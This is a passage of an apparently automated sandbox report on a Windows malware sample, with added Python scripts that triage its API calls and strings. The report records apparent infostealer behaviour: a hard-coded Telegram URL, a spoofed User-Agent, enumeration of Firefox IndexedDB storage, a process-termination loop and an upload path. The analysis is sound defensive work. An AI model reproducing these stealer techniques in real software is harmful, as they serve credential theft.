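SAMPLE_STRINGS = [
    "Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) "
    "Chrome/50.0.2598.249 Safari/603",
    "https://t.me/asdfghjrrewqqqqtfg", "https://", "/ujs/", "1735725939",
    "Hello", "World", "x86", "Kernel32.dll", "Wininet.dll",
    "789593363246702628", "8045878863314484420", "9351356959942806932",
    "13697246453241158521", "2226158375018974002", "3933506600908304605",
    "brCH", "brGk", "exG", "fnc", "ostr", "str", ".",
]

# The three WinINet calls that together form a synchronous HTTP(S) fetch.
WININET_FETCH = frozenset({"InternetOpenA", "InternetOpenUrlA", "InternetReadFile"})
URL_RE = re.compile(r"^https?://([^/\s]+)(/\S*)?$", re.I)
UA_PLATFORM_RE = re.compile(r"^Mozilla/\d+\.\d+ \(([^)]*)\)")
LONG_DECIMAL_RE = re.compile(r"^\d{15,20}$")
EPOCH_RE = re.compile(r"^1[5-9]\d{8}$")  # seconds since 1970, roughly 2017..2033


@dataclass(frozen=True)
class Finding:
    rule: str
    evidence: tuple[str, ...]


def wininet_fetch_chain(apis: list[str]) -> bool:
    """True when the whole open-session / open-URL / read chain is present."""
    return WININET_FETCH <= set(apis)


def hardcoded_hosts(strings: list[str]) -> list[str]:
    """Hostnames of fully-qualified URLs embedded in the sample, in order of appearance."""
    hosts: list[str] = []
    for s in strings:
        m = URL_RE.match(s)
        if m and m.group(1).lower() not in hosts:
            hosts.append(m.group(1).lower())
    return hosts


def ua_platform_mismatch(strings: list[str], host_os: str = "Windows") -> str | None:
    """Platform token of a browser User-Agent that does not name the host OS, else None.

    A Windows PE advertising a Linux or macOS browser is a hand-written UA, not a real client.
    """
    for s in strings:
        m = UA_PLATFORM_RE.match(s)
        if m and host_os.lower() not in m.group(1).lower():
            return m.group(1)
    return None


def long_decimal_tokens(strings: list[str]) -> list[str]:
    """15-20 digit decimal literals. Assumption (not established by the report): these are
    encoded identifiers consumed by a string/API resolution routine, since they appear
    beside 'Kernel32.dll' and 'Wininet.dll' rather than beside any arithmetic."""
    return [s for s in strings if LONG_DECIMAL_RE.match(s)]


def epoch_literals(strings: list[str]) -> dict[str, str]:
    """Map 10-digit literals that parse as recent Unix timestamps to ISO-8601 UTC."""
    return {s: datetime.fromtimestamp(int(s), tz=timezone.utc).isoformat()
            for s in strings if EPOCH_RE.match(s)}


def triage(apis: list[str], strings: list[str]) -> list[Finding]:
    """Run every heuristic; each hit becomes one Finding with the evidence that fired it."""
    findings: list[Finding] = []
    if wininet_fetch_chain(apis):
        findings.append(Finding("wininet-fetch-chain", tuple(sorted(WININET_FETCH))))
    if hosts := hardcoded_hosts(strings):
        findings.append(Finding("hardcoded-url-host", tuple(hosts)))
    if (plat := ua_platform_mismatch(strings)) is not None:
        findings.append(Finding("ua-platform-mismatch", (plat,)))
    if toks := long_decimal_tokens(strings):
        findings.append(Finding("long-decimal-literals", tuple(toks)))
    if stamps := epoch_literals(strings):
        findings.append(Finding("epoch-literal", tuple(f"{k}={v}" for k, v in stamps.items())))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_APIS, SAMPLE_STRINGS):
        print(f"{f.rule:24} {', '.join(f.evidence)}")
```

None of these heuristics is a verdict on its own; the value is in the co-occurrence. A WinINet fetch chain plus a hard-coded messaging-site URL plus a User-Agent that contradicts the host platform is what the sandbox's network signatures are keying on, and the long-decimal rule is only a prompt to look at the routine that consumes those literals, not a claim about what it does.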

Control-flow Graph

APIs
• __EH_prolog3_GS.LIBCMT ref: 001461C7
  • Part of subcall function 0015C2B7: __EH_prolog3_GS.LIBCMT ref: 0015C2C1
  • Part of subcall function 0015C0F0: __EH_prolog3_catch_GS.LIBCMT ref: 0015C0F7
• InternetOpenA.WININET(?,00000001,00000000,00000000,00000000,00000000,2226158375018974002), ref: 0014629D
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3_$H_prolog3_catch_InternetOpen
• String ID: 13697246453241158521$2226158375018974002$3933506600908304605$789593363246702628$Kernel32.dll$Wininet.dll
• API String ID: 1967328160-2221855235
• Opcode ID: 107e9c2323e66a41f0b2fa54da2e24f5e27f3c7db433caed490b3e2021a58c9b
• Instruction ID: 52ff57aeaef2536b59971951eaace694e0cdb9cebb87408f0dd2aaad818a616b
• Opcode Fuzzy Hash: 107e9c2323e66a41f0b2fa54da2e24f5e27f3c7db433caed490b3e2021a58c9b
• Instruction Fuzzy Hash: EE218D70E01249FECB01FBB8894669D7EB5AF25300F50419DF850AB292C7B40F559BE2

                                                                                                                                                                                                Control-flow Graph

APIs
• __EH_prolog3_GS.LIBCMT ref: 0014C1C2
  • Part of subcall function 0014C4D0: __EH_prolog3.LIBCMT ref: 0014C4D7
  • Part of subcall function 0014CAF1: __EH_prolog3.LIBCMT ref: 0014CAF8
  • Part of subcall function 0014CAF1: _Func_class.LIBCONCRT ref: 0014CB97
  • Part of subcall function 0014E5D5: __EH_prolog3_GS.LIBCMT ref: 0014E5DF
  • Part of subcall function 0014CBA6: __EH_prolog3.LIBCMT ref: 0014CBAD
  • Part of subcall function 0014EFDD: __EH_prolog3_GS.LIBCMT ref: 0014EFE7
  • Part of subcall function 0014CCE6: __EH_prolog3_GS.LIBCMT ref: 0014CCED
  • Part of subcall function 00145F62: ___std_exception_destroy.LIBVCRUNTIME ref: 00145FA5
  • Part of subcall function 0014B07F: __EH_prolog3_GS.LIBCMT ref: 0014B086
Strings
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3_$H_prolog3$Func_class___std_exception_destroy
• String ID: value
• API String ID: 367360030-494360628

Control-flow Graph

APIs
• __EH_prolog3.LIBCMT ref: 0014B562
  • Part of subcall function 0014B07F: __EH_prolog3_GS.LIBCMT ref: 0014B086
  • Part of subcall function 0014C4D0: __EH_prolog3.LIBCMT ref: 0014C4D7
  • Part of subcall function 0014E0D4: __EH_prolog3.LIBCMT ref: 0014E0DB
  • Part of subcall function 0014E0D4: _Func_class.LIBCONCRT ref: 0014E12D
  • Part of subcall function 0014E0D4: _Func_class.LIBCONCRT ref: 0014E17F
  • Part of subcall function 0014E0D4: _Func_class.LIBCONCRT ref: 0014E192
  • Part of subcall function 0014C1B8: __EH_prolog3_GS.LIBCMT ref: 0014C1C2
  • Part of subcall function 0014C0C7: _Func_class.LIBCONCRT ref: 0014C10A
• _Func_class.LIBCONCRT ref: 0014B607
Similarity
• API ID: Func_class$H_prolog3$H_prolog3_
• String ID:
• API String ID: 3328072954-0

Control-flow Graph

APIs
• RtlFreeHeap.NTDLL(00000000,00000000,?,00177B16,?,00000000,?,?,00177DB7,?,00000007,?,?,0017836C,?,?), ref: 00170314
• GetLastError.KERNEL32(?,?,00177B16,?,00000000,?,?,00177DB7,?,00000007,?,?,0017836C,?,?), ref: 0017031F
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0

Control-flow Graph

APIs
Similarity
• API ID: H_prolog3_catch
• String ID:
• API String ID: 3886170330-0

Control-flow Graph

APIs
• KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,00145BD8,?,?,?,?,00145BD8,?,00197E08), ref: 0016035E
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0

Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,001414D8,00000000,?), ref: 001718BE
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                 • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                 • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                 • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                 • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                • Opcode ID: 910dd3a45017b1539c174b284e425bfa031cb332ff608004ced7b78781e51ba7
                                                                                                                                                                                                • Instruction ID: d5f6e27cefc20e4b110e0c204f3b01b987089924a3eec91b1c378d22a2e9fb99
                                                                                                                                                                                                • Opcode Fuzzy Hash: 910dd3a45017b1539c174b284e425bfa031cb332ff608004ced7b78781e51ba7
                                                                                                                                                                                                • Instruction Fuzzy Hash: DCE0ED31604220B7EB312A6DAC00B5B3BBCAF117A1F168220BD0D9A680DB64CC4082E7
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00147A8C
                                                                                                                                                                                                  • Part of subcall function 0014B4BA: __EH_prolog3.LIBCMT ref: 0014B4C1
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?,0000035C,00148101,?,\storage\default\,?), ref: 00147AE0
                                                                                                                                                                                                • PathMatchSpecA.SHLWAPI(?,00000000,?), ref: 00147B91
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00147C9B
                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,00000010,?,?,?,?,?,?), ref: 00147D09
                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?), ref: 00147D14
                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,00000010), ref: 00147D46
                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00147D5C
                                                                                                                                                                                                • FindClose.KERNEL32(?,?,?,?,?,?,?), ref: 00147D68
                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00147DB7
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                 • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                 • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                 • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                 • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Find$CloseFile$FirstNext$H_prolog3H_prolog3_MatchPathSpec
                                                                                                                                                                                                • String ID: \idb\
                                                                                                                                                                                                • API String ID: 757186195-120003160
                                                                                                                                                                                                • Opcode ID: 721bae3734f3ebc9ffdfcb7f5050131f8a6a12044b80a32518fc51712b0252fc
                                                                                                                                                                                                • Instruction ID: d77ea6f296181e413c093c3110f0c08e7bba8bd135b380c645df0f29f880316a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 721bae3734f3ebc9ffdfcb7f5050131f8a6a12044b80a32518fc51712b0252fc
                                                                                                                                                                                                • Instruction Fuzzy Hash: B9A18A30C0425ADFCB25EFA0C998BEDBBB4AF24304F5441A8E455A71A2DB745F89CF51
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0015AFF2
                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000268,00149C15,?,?,0018F604), ref: 0015B004
                                                                                                                                                                                                • Process32FirstW.KERNEL32 ref: 0015B022
                                                                                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?,?,?), ref: 0015B0BE
                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0015B0CD
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0015B0D4
                                                                                                                                                                                                • Process32NextW.KERNEL32(?,0000022C), ref: 0015B0E7
                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0015B101
                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 0015B10C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                 • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                 • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                 • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                 • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CloseHandleProcessProcess32$CreateFirstH_prolog3_NextOpenSleepSnapshotTerminateToolhelp32
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 271363041-0
                                                                                                                                                                                                • Opcode ID: 299c88489c93aade95b910695fe218730d0f31fbbf0bb6cdb4bb67946980e4c4
                                                                                                                                                                                                • Instruction ID: ad6451b79fb4e7b73446bc235f9b9134e2d4830681e04c27ebd2f1d03d947986
                                                                                                                                                                                                • Opcode Fuzzy Hash: 299c88489c93aade95b910695fe218730d0f31fbbf0bb6cdb4bb67946980e4c4
                                                                                                                                                                                                • Instruction Fuzzy Hash: BD318D31901229DBCB30AF60CD89BAEB7B4AF10306F104194F969AB190EB315F88CF65
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00158805
                                                                                                                                                                                                  • Part of subcall function 0014B3E8: __EH_prolog3.LIBCMT ref: 0014B3EF
                                                                                                                                                                                                  • Part of subcall function 0014E19F: __EH_prolog3.LIBCMT ref: 0014E1A6
                                                                                                                                                                                                  • Part of subcall function 0014A2AA: __EH_prolog3.LIBCMT ref: 0014A2B1
                                                                                                                                                                                                  • Part of subcall function 00159206: __EH_prolog3_GS.LIBCMT ref: 00159210
                                                                                                                                                                                                  • Part of subcall function 00159C00: __EH_prolog3_catch.LIBCMT ref: 00159C07
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,0018F49C,?,?,?), ref: 00158FAF
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00158FB6
                                                                                                                                                                                                  • Part of subcall function 0014A568: __EH_prolog3_GS.LIBCMT ref: 0014A56F
                                                                                                                                                                                                  • Part of subcall function 00146308: __EH_prolog3_GS.LIBCMT ref: 00146312
                                                                                                                                                                                                  • Part of subcall function 00146308: GetTempPathA.KERNEL32(00000104,?,0000013C), ref: 0014632A
                                                                                                                                                                                                  • Part of subcall function 00156884: __EH_prolog3.LIBCMT ref: 0015688B
                                                                                                                                                                                                  • Part of subcall function 00146671: __EH_prolog3_GS.LIBCMT ref: 0014667B
                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8,0018F3A0), ref: 001590F3
                                                                                                                                                                                                  • Part of subcall function 00146671: OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00146893
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • (, xrefs: 0015914D
                                                                                                                                                                                                • Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603, xrefs: 00159002
                                                                                                                                                                                                • /Up/, xrefs: 0015909B, 00159113
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                 • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                 • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                 • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                 • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3_$H_prolog3$Heap$DebugFreeH_prolog3_catchOutputPathProcessSleepStringTemp
                                                                                                                                                                                                • String ID: ($/Up/$Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
                                                                                                                                                                                                • API String ID: 3833634691-864039517
                                                                                                                                                                                                • Opcode ID: 65d2456872c111c5bbdd2045de260951dc3d878185583c4072c45fe03ef1bd8d
                                                                                                                                                                                                • Instruction ID: 01246874923ca8f60f834256328ad478964bc5594ede9cf7aa66f13c38db1c63
                                                                                                                                                                                                • Opcode Fuzzy Hash: 65d2456872c111c5bbdd2045de260951dc3d878185583c4072c45fe03ef1bd8d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7152AF31D04248EADB15EBA8C885BDDBBB4AF25300F5441E9E145BB1A2DF745F88CF62
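The three listings above (the FindFirstFileA walk seeded with \storage\default\ and filtered with PathMatchSpecA, the CreateToolhelp32Snapshot / OpenProcess(00000001) / TerminateProcess loop, and the function carrying the hard-coded User-Agent and /Up/ strings) give raw API references rather than a behaviour summary. The Python below is an added example, not Joe Sandbox's tooling or code from the sample: it parses lines in the report's own "Api.Module(args), ref: addr" and "text, xrefs: addr" format and tags each function with the behaviour those calls imply. The function labels (the __EH_prolog3_GS reference addresses), the regular expressions and the tag names are my own; the sample lines are copied from this report. OpenProcess's first argument of 00000001 is PROCESS_TERMINATE, and CreateToolhelp32Snapshot's 00000002 is TH32CS_SNAPPROCESS, so the second function asks for exactly the right to kill and nothing more.

```python
"""Tag Joe Sandbox per-function API listings with behaviour labels.

Added example, not Joe Sandbox code: the line grammar is inferred from the
report text, and the tag names and rules are ours.
"""
import re

# "Api.Module(args), ref: addr" (the argument list and comma may be absent) ...
API_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$")
# ... and "text, xrefs: addr[, addr ...]" for string references.
STR_RE = re.compile(
    r"^(?P<text>.*), xrefs: (?P<xrefs>[0-9A-Fa-f]{8}(?:, [0-9A-Fa-f]{8})*)$")
SUBCALL_RE = re.compile(r"^Part of subcall function [0-9A-Fa-f]+: ")

TH32CS_SNAPPROCESS = 0x2   # CreateToolhelp32Snapshot dwFlags
PROCESS_TERMINATE = 0x1    # OpenProcess dwDesiredAccess

# Constructed sample: lines copied from three functions in this report, keyed
# by each function's __EH_prolog3_GS reference address (our labelling).
SAMPLE = {
    "00147A8C": [
        r"FindFirstFileA.KERNEL32(?,?,0000035C,00148101,?,\storage\default\,?), ref: 00147AE0",
        r"PathMatchSpecA.SHLWAPI(?,00000000,?), ref: 00147B91",
        r"FindNextFileA.KERNEL32(00000000,00000010,?,?,?,?,?,?), ref: 00147D09",
        r"FindClose.KERNEL32(00000000,?,?,?,?,?,?), ref: 00147D14",
    ],
    "0015AFF2": [
        "CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000268,00149C15,?,?,0018F604), ref: 0015B004",
        "Process32FirstW.KERNEL32 ref: 0015B022",
        "OpenProcess.KERNEL32(00000001,00000000,?,?,?), ref: 0015B0BE",
        "TerminateProcess.KERNEL32(00000000,00000000), ref: 0015B0CD",
        "CloseHandle.KERNEL32(00000000), ref: 0015B0D4",
        "Process32NextW.KERNEL32(?,0000022C), ref: 0015B0E7",
        "Sleep.KERNEL32(000003E8), ref: 0015B10C",   # 0x3E8 = 1000 ms between passes
    ],
    "00158805": [
        "Part of subcall function 00146308: GetTempPathA.KERNEL32(00000104,?,0000013C), ref: 0014632A",
        "Sleep.KERNEL32(00000BB8,0018F3A0), ref: 001590F3",
        "Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603, xrefs: 00159002",
        "/Up/, xrefs: 0015909B, 00159113",
    ],
}


def parse_line(line):
    """Return ("api", record) or ("string", record) for one report line, else None."""
    line = SUBCALL_RE.sub("", line.strip().lstrip("•").strip())
    m = API_RE.match(line)
    if m:
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw is not None else []
        return "api", {"api": m.group("api"), "module": m.group("module"),
                       "args": args, "ref": m.group("ref")}
    m = STR_RE.match(line)
    if m:
        return "string", {"text": m.group("text"), "xrefs": m.group("xrefs").split(", ")}
    return None


def arg_value(args, index):
    """Hex argument at position index, or None when unknown ('?') or missing."""
    try:
        return int(args[index], 16)
    except (IndexError, ValueError):
        return None


def classify(apis, strings):
    """Map one function's parsed API calls and strings to a set of behaviour tags."""
    tags = set()
    names = [a["api"] for a in apis]
    first = {}
    for a in apis:
        first.setdefault(a["api"], a)

    # Process-kill loop: snapshot all processes, walk them, open each one and
    # terminate it. Flag separately when the open asks for PROCESS_TERMINATE only.
    snap, opn = first.get("CreateToolhelp32Snapshot"), first.get("OpenProcess")
    if (snap and arg_value(snap["args"], 0) == TH32CS_SNAPPROCESS
            and any(n.startswith("Process32First") for n in names)
            and any(n.startswith("Process32Next") for n in names)
            and opn and "TerminateProcess" in names):
        tags.add("process_kill_loop")
        if arg_value(opn["args"], 0) == PROCESS_TERMINATE:
            tags.add("opens_with_PROCESS_TERMINATE_only")

    # Directory walk seeded with \storage\default\, which with the \idb\ string
    # matches the IndexedDB layout of Firefox-family browser profiles.
    if "FindFirstFileA" in names and "FindNextFileA" in names:
        seeds = [arg for a in apis for arg in a["args"] if "\\" in arg]
        if any("\\storage\\default\\" in s.lower() for s in seeds):
            tags.add("enumerates_storage_default")
        if "PathMatchSpecA" in names:
            tags.add("wildcard_file_filter")

    # HTTP client preparation: hard-coded User-Agent and URL path. The sample is
    # a 32-bit Windows PE, so a User-Agent claiming Linux is a platform mismatch.
    texts = [s["text"] for s in strings]
    ua = next((t for t in texts if t.startswith("Mozilla/")), None)
    if ua:
        tags.add("hardcoded_user_agent")
        if "Linux" in ua:
            tags.add("ua_claims_linux_on_windows")
    if any(t.startswith("/") and t.endswith("/") and len(t) > 1 for t in texts):
        tags.add("hardcoded_url_path")
    return tags


def classify_listing(lines):
    """Parse a function's report lines and classify them."""
    apis, strings = [], []
    for line in lines:
        parsed = parse_line(line)
        if parsed is not None:
            (apis if parsed[0] == "api" else strings).append(parsed[1])
    return classify(apis, strings)


def report(sample=SAMPLE):
    """Sorted tag list per function label."""
    return {label: sorted(classify_listing(lines)) for label, lines in sample.items()}


if __name__ == "__main__":
    for label, tags in report().items():
        print(label, ", ".join(tags) or "-")
```

The same parser runs over the whole report once the listing blocks are split per function; the useful signal here is not any single API but the combination within one function, which is why the rules check co-occurrence (snapshot plus walk plus terminate) rather than individual imports.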
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                 • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                 • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                 • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                 • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: __floor_pentium4
                                                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                • API String ID: 4168288129-2761157908
                                                                                                                                                                                                • Opcode ID: fad8626856dc6bb69b29ac779d622fd5fca5e3c0bf59b7dab0395e9d38f5e016
                                                                                                                                                                                                • Instruction ID: 14eba498e0c7412f92146fedb40343f882b6cd74ca15620038acf2dc94a303b6
                                                                                                                                                                                                • Opcode Fuzzy Hash: fad8626856dc6bb69b29ac779d622fd5fca5e3c0bf59b7dab0395e9d38f5e016
                                                                                                                                                                                                • Instruction Fuzzy Hash: 73D23A71E086298FDB65CE28DD407EAB7B5FB54305F1481EAD44DE7240EB78AE818F81
APIs
• GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00179442
• GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 0017946B
• GetACP.KERNEL32 ref: 00179480
Strings
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
• Opcode ID: f144e3abeab517ce762d7f02dc4fe219702648694b85c5b6e2765d72d795b810
• Instruction ID: 0770a2bce3074ed400cc832729f7024f908f234110663d667ca8c1618733fd10
• Opcode Fuzzy Hash: f144e3abeab517ce762d7f02dc4fe219702648694b85c5b6e2765d72d795b810
• Instruction Fuzzy Hash: 8F21C272A04100A6EB348F65CA44A9B73B6FB94B60B16C464E90FDB251E732DE4AC350
APIs
  • Part of subcall function 001713A9: GetLastError.KERNEL32(00000000,00000000,00177270), ref: 001713AD
  • Part of subcall function 001713A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0017144F
• GetUserDefaultLCID.KERNEL32 ref: 0017968D
• IsValidCodePage.KERNEL32(00000000), ref: 001796CB
• IsValidLocale.KERNEL32(?,00000001), ref: 001796DE
• GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00179726
• GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00179741
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
• String ID:
• API String ID: 415426439-0
• Opcode ID: 97dc36530a4b49ca9fc7aa279afa366cc9aa056bce1a80a81cdc3655ff3d8e49
• Instruction ID: 1c37b9ed2ea1605bbdfc6d466332cf3cbd3edfaefa9986ca664670479b28eee9
• Opcode Fuzzy Hash: 97dc36530a4b49ca9fc7aa279afa366cc9aa056bce1a80a81cdc3655ff3d8e49
• Instruction Fuzzy Hash: 40519171A00215AFDB14EFA5CC45ABE77BCBF54700F04856AF518EB191EB709A48CB61
Memory Dump Source
